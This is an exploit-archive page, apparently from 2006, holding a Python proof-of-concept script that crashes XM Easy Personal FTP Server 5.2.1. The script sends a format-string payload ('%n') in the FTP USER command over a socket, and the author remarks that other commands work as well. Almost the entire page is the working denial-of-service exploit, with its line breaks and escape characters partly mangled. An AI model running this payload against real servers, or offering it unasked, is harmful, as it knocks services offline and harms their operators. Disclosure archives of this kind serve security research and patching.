[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : XM Easy Personal FTP Server 5.2.1 (USER) Format String DoS Exploit
# Published : 2006-12-22
# Author : shinnai
# Previous Title : acFTP FTP Server 1.5 (REST/PBSZ) Remote Denial of Service Exploit
# Next Title : DREAM FTP Server 1.0.2 (PORT) Remote Denial of Service Exploit
import sys,os,string
import socket
import time
print "-----------------------------------------------------------------------"
print "# XM Easy Personal FTP Server 5.2.1 format string Denial of Service"
print "# url: http://www.dxm2008.com/"
print "# author: shinnai"
print "# mail: shinnai[at]autistici[dot]org"
print "# site: http://shinnai.altervista.org"
print "-----------------------------------------------------------------------"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
conn = s.connect(("127.0.0.1",21))
except:
print "- Unable to connect. exiting."
d = s.recv(1024)
time.sleep(2)
s.send('USER %srn' % "%n") # or use every available command or really what you like
time.sleep(2) # I try to use CFGHT command and it works :)
# www.Syue.com [2006-12-22]